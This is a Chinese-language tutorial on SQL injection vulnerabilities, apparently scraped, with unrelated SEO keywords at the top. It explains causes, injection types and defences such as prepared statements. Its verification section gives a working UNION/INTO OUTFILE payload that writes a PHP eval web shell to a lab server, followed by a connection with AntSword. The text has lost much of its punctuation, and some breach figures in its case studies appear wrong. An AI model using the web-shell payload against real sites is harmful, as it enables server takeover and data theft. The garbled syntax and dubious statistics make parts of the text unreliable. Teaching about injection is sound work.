深圳网站设计公司怎么做,微信公众平台注册要钱吗,镇江网站建设优化,个人电影网站备案SQL 注入漏洞详解
漏洞描述
sql注入漏洞是指恶意用户在应用与数据库交互的地方利用非法的操作获取数据库内容从以下两点分析:
没有对用户输入的数据进行充分的过滤和验证#xff0c;导致一些用户利用此漏洞向数据库插入恶意sql语句非法请求数据库从而获得一些敏感数据在与数…SQL 注入漏洞详解
漏洞描述
sql注入漏洞是指恶意用户在应用与数据库交互的地方利用非法的操作获取数据库内容从以下两点分析:
没有对用户输入的数据进行充分的过滤和验证导致一些用户利用此漏洞向数据库插入恶意sql语句非法请求数据库从而获得一些敏感数据在与数据库交时未对用户可控参数进行足够的过滤便将参数内容拼接到SOL 语句中修改原有的sql语句逻辑从而对数据库进行非法操作。
漏洞原理
通常在与数据库交互的地方开发人员在处理和数据库交互时未设置充足的过滤与验证或没对用户输入的参数进行控制时非法用户利用漏洞打破原有的sql语句篡改原有语句的逻辑从而使得数据库执行被篡改的sql语句请求非正常授权内容。严重导致数据库数据泄露数据篡改等
漏洞场景
sql注入漏洞一般存在于与数据交互的地方例如:
url参数传递表单提交搜索框http头文件 cookieUser-AgentReferer
漏洞评级
漏洞等级高危
漏洞危害
SQL注入漏洞可能会导致严重的安全问题其中包括
数据库数据泄露数据库篡改拒绝服务数据库信息丢失如果数据库权限分配不当或本身就存在缺陷那么攻击者就会通过该漏洞直接获取webshell或服务器权限
漏洞验证
联合查询时使用into outfile函数进行文件上传 回显位写入一句话木马 最后加上函数和要上传的绝对路径
http://10.9.47.77/sqli-labs/Less-2/?id2 and 12 union select 1,?php eval ($_REQUEST[777]);?,3 into outfile C:/phpstudy_2016/www/yjh.php --文件上传成功使用密码777进行连接测试phpinfo 打开蚁剑进行连接
漏洞利用
五大注入手法
联合查询注入报错注入布尔盲注延时注入
其他注入
宽字节注入HTTP头部注入 cookie注入User-Agent注入Base64注入Referer注入 OOB 注入
防御方案 避免采用拼接的方式构造 SQL 语句可以采用PDO预编译等技术 对进入 SQL 语句的参数进行足够过滤。 部署安全设备如 WAF。定制武器库
典型案例
2008年Heartland Payment Systems公司遭受了一次SQL注入攻击导致超过1300万张信用卡信息被窃取。攻击者利用了Heartland Payment Systems公司的网站上存在的SQL注入漏洞注入了恶意代码从而获取了信用卡信息。
2015年美国联邦政府办公室人事管理局遭受了一次SQL注入攻击导致超过2100万名联邦雇员的个人信息被窃取。攻击者利用了该机构网站上存在的SQL注入漏洞注入了恶意代码从而获取了个人信息。
2016年菲律宾选举委员会遭受了一次SQL注入攻击导致超过550万名选民的个人信息被窃取。攻击者利用了该机构网站上存在的SQL注入漏洞注入了恶意代码从而获取了选民的个人信息。
这些案例表明SQL注入漏洞是一种非常严重的安全威胁可以导致大量敏感数据被窃取。因此开发人员和网站管理员需要认真对待SQL注入漏洞采取必要的措施来防范和修复这种漏洞。
